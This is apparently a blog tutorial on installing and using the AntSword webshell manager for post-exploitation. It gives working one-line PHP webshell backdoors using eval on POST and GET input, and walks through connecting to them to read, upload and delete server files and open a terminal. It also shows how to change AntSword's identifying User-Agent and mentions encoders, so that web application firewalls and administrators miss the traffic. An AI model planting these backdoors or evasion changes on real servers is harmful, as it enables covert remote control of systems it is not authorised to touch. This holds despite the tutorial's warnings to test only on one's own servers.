AntSword – a Security Tool for Post Exploitation

AntSword
AntSword

AntSword is an very easy to use tool for pentesters, security groups as a Post Exploitation tool it can also be used for webmasters etc. Do not use this tool on unauthorized servers/environments or for illegal purpose. It can be a better alternative to Weevely

Description from Official website

AntSword is an open source, cross-platform website administration tool, being designed to meet the needs of penetration testers together with security researchers with permissions and/or authorizations as well as webmasters.
 
Anyone shall not use it for illegal purposes and profitability. Besides that, publishing unauthorized modified version is also prohibited, or otherwise bear legal responsibilities.

1 Installation

1.1 Download correct file/zip file

The AntSword-Loader (or A launcher) can be downloaded here: https://github.com/AntSwordProject/AntSword-Loader

It can be used on Microsoft Windows, Linux and macOS platforms.

Windows AntSword
Windows AntSword

1.2 Install or unzip content

Here, we unzip to “C:\Users\win10\Desktop\as-4.0.3”

Unzip AntSword
Unzip AntSword

1.3 Launch “AntSword.exe”

AntSword::Loader
AntSword::Loader

1.4 Click on “Initialize” button

1.5 Select a working directory

In this example, we create a “working-dir” working directory under main directory which is “C:\Users\win10\Desktop\as-4.0.3\working-dir”

Select the folder, then click on “Select folder” button

It will start to download necessary package (Which is “antSword-master.zip”)

(You might encounter following error)

Unzip Error Code: [object Object]

Unzip Error Code: [object Object]
Unzip Error Code: [object Object]

If you have encountered this error follow 1.5.1

1.5.1 Fix the error

Open the working directory we have just selected, a folder with name “antSword-master” and a zip file with name “antSword-master.zip” may appear there, delete them.

1.5.2 Try to launch the AntSword-Loader with Admin rights, then repeat Step 1.3 to Step 1.5 again.

We should be able to see following screen

download successful Extracting file...
download successful Extracting file…

When it’s done

Set up successful Please manually restart later!
Set up successful Please manually restart later!

Then, this Window will disappear, the program will terminate by itself.

1.6 Now we can launch the “AntSword.exe” again, it is now ready to be used

2 Simple usage Demonstration

First, we need to deploy a webshell/Sometimes… so called backdoor/Trojan

In this example we are going to use PHP

2.1 Create a php file “test.php”

2.2 Save following content to “test.php” file

<?php eval($_POST['mytestshell']); ?>

2.3 Upload to your own testing server (Please do not test on production server or any server which does not belong to you)

2.4 Right click on blank space, click on “Add”

2.5 Enter correct server details

Shell url: Your test.php path

Shell pwd: Shell password which is the content behind $_POST, “mytestshell” in this case

Shell type: PHP

2.6 Click on “Add” button

Add Shell
Add Shell

2.5 Now it will appear under “Shell Lists”

Shell Lists
Shell Lists

2.6 Double click on the item, we can now see all files on the server (As long as the user who is running the server process has corresponding privileges)

View folders, files on the server
View folders, files on the server
View folders, files on the server
View folders, files on the server

We can even upload, download files to/from selected folder/file, create, modify, delete files and folders, even open Terminal

AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell
AntSword connected to WebShell

3 Other

It also supports other Shell types besides PHP

Add shell - Shell type
Add shell – Shell type

Send customized HTTP Header/Body value

Add shell - HTTP Header, Body
Add shell – HTTP Header, Body

Other settings

Add shell - Other
Add shell – Other

Proxy, Plugin Store, Encoder etc.

AntSword
AntSword

AntSword official documentation: https://doc.u0u.us/en/getting_started/first_shell.html

Bonus 1 – Use AntSword with PHP get request

Wonder how to use AntSword with $_GET rather than $_POST in PHP?

Here is how

The PHP file

Rather than

<?php eval($_POST['mytestshell']); ?>

We use

<?php eval($_GET['mytestshell']); ?>

The Settings in AntSword

Shell url: http://xxxxxxxxxx.com/test.php?mytestshell=eval($_POST[‘mypswd’]);

Shell pwd: mypswd

Bonus 2 – Modify User-Agents

By default, AntSword uses “antSword/v2.1” or “antSword/v2.0” as user agent when updating the webshell information or connecting the webshell. Which can be recognized by WAF or human easily.

To change User-Agent for AntSword.

There are 2 files and 3 places we need to modify

b2.1.1 File 1 is “request.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\request.js”

Note: “working-dir” was created during Step 1.5

b2.1.2 Open “request.js” via Notepad or any text editor, Search for “USER_AGENT”

b2.1.3 Change “antSword/v2.1” to what ever you like, then save the file

b2.2.1 File 2 is “update.js” under “X:\path\to\antsword\working-dir\antSword-master\modules\update.js”

b2.2.2 Open “update.js” via Notepad or any text editor, Search for “User-Agent”

b2.2.3 Change “antSword/v2.0” to what ever you like, then save the file

Bonus 3 – Latest User-Agents

Chrome

on Windows

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Linux

Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36

on Android

Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Mobile Safari/537.36

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/80.0.3987.95 Mobile/15E148 Safari/605.1

Firefox

on Windows

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/74.0

on Linux

Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/74.0

on macOS

Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) Gecko/20100101 Firefox/74.0

on Android

Mozilla/5.0 (Android 8.0.0; Mobile; rv:61.0) Gecko/61.0 Firefox/68.0

on iOS

Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/23.0 Mobile/16B92 Safari/605.1.15

IE 11/Internet Explorer 11 on Windows 10

Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko

Edge on Windows 10

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36 Edg/80.0.361.62

YandexBot

Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)


There are many more features we can utilize, including encoding/decoding, which is very helpful when trying to evading Web Application Firewall (WAF), plugins, Multipart payload etc.

Warning: Do not use or test this tool on unauthorised servers.


Leave a Reply

Your email address will not be published. Required fields are marked *